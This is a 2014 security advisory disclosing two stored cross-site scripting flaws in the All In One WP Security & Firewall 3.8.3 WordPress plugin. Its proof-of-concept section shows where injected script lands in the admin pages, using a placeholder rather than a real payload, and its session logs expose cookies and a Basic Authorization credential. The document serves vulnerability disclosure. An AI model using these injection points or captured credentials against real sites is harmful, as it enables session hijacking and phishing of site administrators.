366 lines
No EOL
19 KiB
Text
366 lines
No EOL
19 KiB
Text
Document Title:
|
||
===============
|
||
All In One Wordpress Firewall 3.8.3 - Persistent Vulnerability
|
||
|
||
|
||
References (Source):
|
||
====================
|
||
http://www.vulnerability-lab.com/get_content.php?id=1325
|
||
|
||
|
||
Release Date:
|
||
=============
|
||
2014-09-29
|
||
|
||
|
||
Vulnerability Laboratory ID (VL-ID):
|
||
====================================
|
||
1327
|
||
|
||
|
||
Common Vulnerability Scoring System:
|
||
====================================
|
||
3.3
|
||
|
||
|
||
Product & Service Introduction:
|
||
===============================
|
||
WordPress itself is a very secure platform. However, it helps to add some extra security and firewall to your site by using a
|
||
security plugin that enforces a lot of good security practices. The All In One WordPress Security plugin will take your website
|
||
security to a whole new level. This plugin is designed and written by experts and is easy to use and understand. It reduces
|
||
security risk by checking for vulnerabilities, and by implementing and enforcing the latest recommended WordPress security
|
||
practices and techniques.
|
||
|
||
(Copy of the Vendor Homepage: https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ )
|
||
|
||
|
||
Abstract Advisory Information:
|
||
==============================
|
||
The Vulnerability Laboratory Research Team discovered two persistent vulnerabilities in the official All in One Security & Firewall v3.8.3 Wordpress Plugin.
|
||
|
||
|
||
Vulnerability Disclosure Timeline:
|
||
==================================
|
||
2014-09-29: Public Disclosure (Vulnerability Laboratory)
|
||
|
||
|
||
Discovery Status:
|
||
=================
|
||
Published
|
||
|
||
|
||
Affected Product(s):
|
||
====================
|
||
Github
|
||
Product: All In One Security & Firewall - Wordpress Plugin 3.8.3
|
||
|
||
|
||
Exploitation Technique:
|
||
=======================
|
||
Remote
|
||
|
||
|
||
Severity Level:
|
||
===============
|
||
Medium
|
||
|
||
|
||
Technical Details & Description:
|
||
================================
|
||
Two POST inject web vulnerabilities has been discovered in the official All in One WP Security and Firewall v3.8.3 Plugin.
|
||
The vulnerability allows remote attackers to inject own malicious script codes to the application-side of the vulnerable service.
|
||
|
||
The first vulnerability is located in the 404 detection redirect url input field of the firewall detection 404 application module.
|
||
Remote attackers are able to prepare malicious requests that inject own script codes to the application-side of the vulnerable service.
|
||
The request method to inject is POST and the attack vector that exploits the issue location on the application-side (persistent).
|
||
The attacker injects own script codes to the 404 detection redirect url input field and the execution occurs in the same section
|
||
next to the input field context that gets displayed again.
|
||
|
||
The second vulnerability is location in the file name error logs url input field of the FileSystem Components > Host System Logs module.
|
||
Remote attackers are able to prepare malicious requests that inject own script codes to the applicaation-side of the vulnerable service.
|
||
The request method to inject is POST and the attack vector that exploits the issue location on the application-side (persistent).
|
||
The attacker injects own script codes to the file name error logs url input field and the execution occurs in the same section
|
||
next to the input field context that gets displayed again.
|
||
|
||
The security risk of the persistent POST inject vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.2.
|
||
Exploitation of the application-side web vulnerability requires no privileged web-application user account but low or medium user interaction.
|
||
Successful exploitation of the vulnerability results in persistent phishing attacks, session hijacking, persistent external redirect to malicious
|
||
sources and application-side manipulation of affected or connected module context.
|
||
|
||
|
||
Request Method(s):
|
||
[+] POST
|
||
|
||
Vulnerable Module(s):
|
||
[+] Firewall - Detection 404
|
||
[+] FileSystem Components > Host System
|
||
Vulnerable Parameter(s):
|
||
[+] 404 detection redirect url
|
||
[+] file name error logs url
|
||
|
||
Affected Module(s):
|
||
[+] Firewall - Detection 404
|
||
[+] FileSystem Components > Host System
|
||
|
||
|
||
Proof of Concept (PoC):
|
||
=======================
|
||
1.1
|
||
The first POST inject web vulnerability can be exploited by remote attackers without privileged application user account and with low or
|
||
medium user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and
|
||
steps below to continue.
|
||
|
||
PoC: Exploit (Firewall > Detection 404 > [404 Lockout Redirect URL] )
|
||
|
||
<tr valign="top">
|
||
<th scope="row">404 Lockout Redirect URL:</th>
|
||
<td><input size="50" name="aiowps_404_lock_redirect_url" value="http://127.0.0.1\"
|
||
type="text"><\"<img src="\"x\"">%20%20>\"<%5C%22x%5C%22[PERSISTENT INJECTED SCRIPT CODE VIA 404 Lockout Redirect URL INPUT!]>" />
|
||
<span class="description">A blocked visitor will be automatically redirected to this URL.</span>
|
||
</td>
|
||
</tr>
|
||
</table>
|
||
<input type="submit" name="aiowps_save_404_detect_options" value="Save Settings" class="button-primary" />
|
||
|
||
</form>
|
||
</div></div>
|
||
<div class="postbox">
|
||
<h3><label for="title">404 Event Logs</label></h3>
|
||
<div class="inside">
|
||
<form id="tables-filter" method="post">
|
||
<!-- For plugins, we also need to ensure that the form posts back to our current page -->
|
||
<input type="hidden" name="page" value="aiowpsec_firewall" />
|
||
<input type="hidden" name="tab" value="tab6" /> <!-- Now we can render the completed list table -->
|
||
<input type="hidden" id="_wpnonce" name="_wpnonce" value="054474276c" /><input type="hidden" name="_wp_http_referer"
|
||
value="/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6" /> <div class="tablenav top">
|
||
|
||
<div class="alignleft actions">
|
||
<select name='action'>
|
||
<option value='-1' selected='selected'>Bulk Actions</option>
|
||
<option value='delete'>Delete</option>
|
||
</select>
|
||
<input type="submit" name="" id="doaction" class="button action" value="Apply" onClick="return confirm("Are you sure you want to perform this bulk operation on the selected entries?")" />
|
||
</div>
|
||
<div class='tablenav-pages no-pages'><span class="displaying-num">0 items</span>
|
||
<span class='pagination-links'><a class='first-page disabled' title='Go to the first page' href='http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6'>«</a>
|
||
<a class='prev-page disabled' title='Go to the previous page' href='http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6&paged=1'>‹</a>
|
||
<span class="paging-input"><input class='current-page' title='Current page' type='text' name='paged' value='1' size='1' /> of <span class='total-pages'>0</span></span>
|
||
<a class='next-page' title='Go to the next page' href='http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6&paged=0'>›</a>
|
||
<a class='last-page' title='Go to the last page' href='http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6&paged=0'>»</a></span></div>
|
||
<br class="clear" />
|
||
</div>
|
||
|
||
|
||
--- PoC Session Logs [POST] (Firewall > 404 Detection) ---
|
||
Status: 200[OK]
|
||
POST http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6 Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[8095] Mime Type[text/html]
|
||
Request Header:
|
||
Host[www.vulnerability-db.com]
|
||
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
|
||
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
||
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||
Accept-Encoding[gzip, deflate]
|
||
Referer[http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall]
|
||
Cookie[wordpress_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C60421eb1c23917aaee2fcb45ab9f3398; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C7db4030c5de3be6fcc424f35c591e74b; wp-settings-1=m5%3Do%26m9%3Dc%26m6%3Dc%26m4%3Dc%26m3%3Dc%26m2%3Dc%26m1%3Do%26editor%3Dtinymce%26m7%3Dc%26m0%3Dc%26hidetb%3D1%26uploader%3D1%26m8%3Dc%26mfold%3Do%26libraryContent%3Dupload%26ed_size%3D393%26wplink%3D1; wp-settings-time-1=1411750846]
|
||
Authorization[Basic a2V5Z2VuNDQ3OjMyNTg1MjMyNTIzNS4yMTItNTg=]
|
||
Connection[keep-alive]
|
||
Response Header:
|
||
Server[nginx]
|
||
Date[Fri, 26 Sep 2014 17:40:21 GMT]
|
||
Content-Type[text/html; charset=UTF-8]
|
||
Content-Length[8095]
|
||
Connection[keep-alive]
|
||
Expires[Wed, 11 Jan 1984 05:00:00 GMT]
|
||
Cache-Control[no-cache, must-revalidate, max-age=0]
|
||
Pragma[no-cache]
|
||
X-Frame-Options[SAMEORIGIN]
|
||
X-Powered-By[PleskLin]
|
||
Vary[Accept-Encoding]
|
||
Content-Encoding[gzip]
|
||
|
||
-
|
||
Status: 200[OK]
|
||
GET http://www.vulnerability-db.com/dev/wp-admin/%5C%22x%5C%22[PERSISTENT INJECTED SCRIPT CODE VIA 404 Lockout Redirect URL INPUT!] Load Flags[LOAD_NORMAL] Größe des Inhalts[557] Mime Type[text/html]
|
||
Request Header:
|
||
Host[www.vulnerability-db.com]
|
||
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
|
||
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
|
||
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||
Accept-Encoding[gzip, deflate]
|
||
Referer[http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6]
|
||
Cookie[wordpress_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C60421eb1c23917aaee2fcb45ab9f3398; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C7db4030c5de3be6fcc424f35c591e74b; wp-settings-1=m5%3Do%26m9%3Dc%26m6%3Dc%26m4%3Dc%26m3%3Dc%26m2%3Dc%26m1%3Do%26editor%3Dtinymce%26m7%3Dc%26m0%3Dc%26hidetb%3D1%26uploader%3D1%26m8%3Dc%26mfold%3Do%26libraryContent%3Dupload%26ed_size%3D393%26wplink%3D1; wp-settings-time-1=1411750846]
|
||
Authorization[Basic a2V5Z2VuNDQ3OjMyNTg1MjMyNTIzNS4yMTItNTg=]
|
||
Connection[keep-alive]
|
||
Response Header:
|
||
Server[nginx]
|
||
Date[Fri, 26 Sep 2014 17:40:22 GMT]
|
||
Content-Type[text/html]
|
||
Content-Length[557]
|
||
Connection[keep-alive]
|
||
Last-Modified[Tue, 14 May 2013 13:05:17 GMT]
|
||
Etag["4ea065b-3c6-4dcad48e5901e"]
|
||
Accept-Ranges[bytes]
|
||
Vary[Accept-Encoding]
|
||
Content-Encoding[gzip]
|
||
X-Powered-By[PleskLin]
|
||
|
||
|
||
|
||
|
||
Reference(s):
|
||
/wp-admin/admin.php?page=aiowpsec_firewall
|
||
/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6
|
||
/wp-admin/%5C%22x%5C%22[PERSISTENT INJECTED SCRIPT CODE VIA 404 Lockout Redirect URL INPUT!]
|
||
/wp-admin/admin.php?page=aiowpsec_firewall&tab=tab6&paged=0
|
||
|
||
|
||
|
||
|
||
1.2
|
||
The second POST inject web vulnerability can be exploited by remote attackers without privileged application user account and with low or medium
|
||
user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
|
||
|
||
PoC: FileSystem Components > Host System Logs
|
||
|
||
<div class="inside">
|
||
<p>Please click the button below to view the latest system logs:</p>
|
||
<form action="" method="POST">
|
||
<input id="_wpnonce" name="_wpnonce" value="92d4aba49c" type="hidden">
|
||
<input name="_wp_http_referer" value="/dev/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4" type="hidden">
|
||
<div>Enter System Log File Name:
|
||
<input size="25" name="aiowps_system_log_file" value="error_log>\\>\"[PERSISTENT INJECTED SCRIPT CODE!] type="text">" />
|
||
<span class="description">Enter your system log file name. (Defaults to error_log)</span>
|
||
</div>
|
||
<div class="aio_spacer_15"></div>
|
||
<input name="aiowps_search_error_files" value="View Latest System Logs" class="button-primary search-error-files" type="submit">
|
||
<span style="display: none;" class="aiowps_loading_1">
|
||
<img src="http://www.vulnerability-db.com/dev/wp-content/plugins/all-in-one-wp-security-and-firewall/images/loading.gif" alt="">
|
||
</span>
|
||
</form>
|
||
</div>
|
||
|
||
|
||
--- PoC Session Logs [POST] ---
|
||
Status: 200[OK]
|
||
POST http://www.vulnerability-db.com/dev/wp-admin/admin-ajax.php Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Größe des Inhalts[-1] Mime Type[application/json]
|
||
Request Header:
|
||
Host[www.vulnerability-db.com]
|
||
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
|
||
Accept[application/json, text/javascript, */*; q=0.01]
|
||
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||
Accept-Encoding[gzip, deflate]
|
||
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
|
||
X-Requested-With[XMLHttpRequest]
|
||
Referer[http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4]
|
||
Content-Length[109]
|
||
Cookie[wordpress_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C60421eb1c23917aaee2fcb45ab9f3398; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C7db4030c5de3be6fcc424f35c591e74b; wp-settings-1=m5%3Do%26m9%3Dc%26m6%3Dc%26m4%3Dc%26m3%3Dc%26m2%3Dc%26m1%3Do%26editor%3Dtinymce%26m7%3Dc%26m0%3Dc%26hidetb%3D1%26uploader%3D1%26m8%3Dc%26mfold%3Do%26libraryContent%3Dupload%26ed_size%3D393%26wplink%3D1; wp-settings-time-1=1411750846]
|
||
Authorization[Basic a2V5Z2VuNDQ3OjMyNTg1MjMyNTIzNS4yMTItNTg=]
|
||
Connection[keep-alive]
|
||
Pragma[no-cache]
|
||
Cache-Control[no-cache]
|
||
POST-Daten:
|
||
interval[60]
|
||
_nonce[176fea481c]
|
||
action[heartbeat]
|
||
screen_id[wp-security_page_aiowpsec_filesystem]
|
||
has_focus[false]
|
||
Response Header:
|
||
Server[nginx]
|
||
Date[Fri, 26 Sep 2014 17:53:44 GMT]
|
||
Content-Type[application/json; charset=UTF-8]
|
||
Transfer-Encoding[chunked]
|
||
Connection[keep-alive]
|
||
X-Robots-Tag[noindex]
|
||
x-content-type-options[nosniff]
|
||
Expires[Wed, 11 Jan 1984 05:00:00 GMT]
|
||
Cache-Control[no-cache, must-revalidate, max-age=0]
|
||
Pragma[no-cache]
|
||
X-Frame-Options[SAMEORIGIN]
|
||
X-Powered-By[PleskLin]
|
||
|
||
|
||
|
||
|
||
Status: 200[OK]
|
||
GET http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4 Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[6136] Mime Type[text/html]
|
||
Request Header:
|
||
Host[www.vulnerability-db.com]
|
||
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
|
||
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
||
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||
Accept-Encoding[gzip, deflate]
|
||
Referer[http://www.vulnerability-db.com/dev/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4]
|
||
Cookie[wordpress_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C60421eb1c23917aaee2fcb45ab9f3398; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bc813bed717c4ce778c96982590b35f9=VLAB-TEAM%7C1411923645%7C7db4030c5de3be6fcc424f35c591e74b; wp-settings-1=m5%3Do%26m9%3Dc%26m6%3Dc%26m4%3Dc%26m3%3Dc%26m2%3Dc%26m1%3Do%26editor%3Dtinymce%26m7%3Dc%26m0%3Dc%26hidetb%3D1%26uploader%3D1%26m8%3Dc%26mfold%3Do%26libraryContent%3Dupload%26ed_size%3D393%26wplink%3D1; wp-settings-time-1=1411750846]
|
||
Authorization[Basic a2V5Z2VuNDQ3OjMyNTg1MjMyNTIzNS4yMTItNTg=]
|
||
Connection[keep-alive]
|
||
Response Header:
|
||
Server[nginx]
|
||
Date[Fri, 26 Sep 2014 17:53:54 GMT]
|
||
Content-Type[text/html; charset=UTF-8]
|
||
Content-Length[6136]
|
||
Connection[keep-alive]
|
||
Expires[Wed, 11 Jan 1984 05:00:00 GMT]
|
||
Cache-Control[no-cache, must-revalidate, max-age=0]
|
||
Pragma[no-cache]
|
||
X-Frame-Options[SAMEORIGIN]
|
||
X-Powered-By[PleskLin]
|
||
Vary[Accept-Encoding]
|
||
Content-Encoding[gzip]
|
||
|
||
|
||
|
||
|
||
Reference(s):
|
||
/wp-admin/admin-ajax.php
|
||
/wp-admin/admin.php?page=aiowpsec_filesystem
|
||
/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4
|
||
/wp-content/plugins/all-in-one-wp-security-and-firewall/
|
||
/wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4
|
||
|
||
|
||
Solution - Fix & Patch:
|
||
=======================
|
||
The vulnerability can be patched by a secure parse of the Enter System Log File Name input context in the file system security module.
|
||
The second issue can be patched by a secure encode and parse of the 404 Lockout Redirect URL input context in the firewall 404 detection module.
|
||
Restrit the input and handle malicious context with a own secure eception handling to prevent further POSt injection attacks.
|
||
|
||
|
||
Security Risk:
|
||
==============
|
||
The security risk of the POSt inject web vulnerabilities in the firewall module are estimated as medium.
|
||
|
||
|
||
Credits & Authors:
|
||
==================
|
||
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
|
||
|
||
|
||
Disclaimer & Information:
|
||
=========================
|
||
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
|
||
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
|
||
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
|
||
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
|
||
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
|
||
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
|
||
|
||
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
|
||
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
|
||
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
|
||
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
||
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
||
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
|
||
|
||
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
|
||
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
|
||
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
|
||
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
|
||
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
|
||
|
||
Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
|
||
|
||
|
||
--
|
||
VULNERABILITY LABORATORY RESEARCH TEAM
|
||
DOMAIN: www.vulnerability-lab.com
|
||
CONTACT: research@vulnerability-lab.com |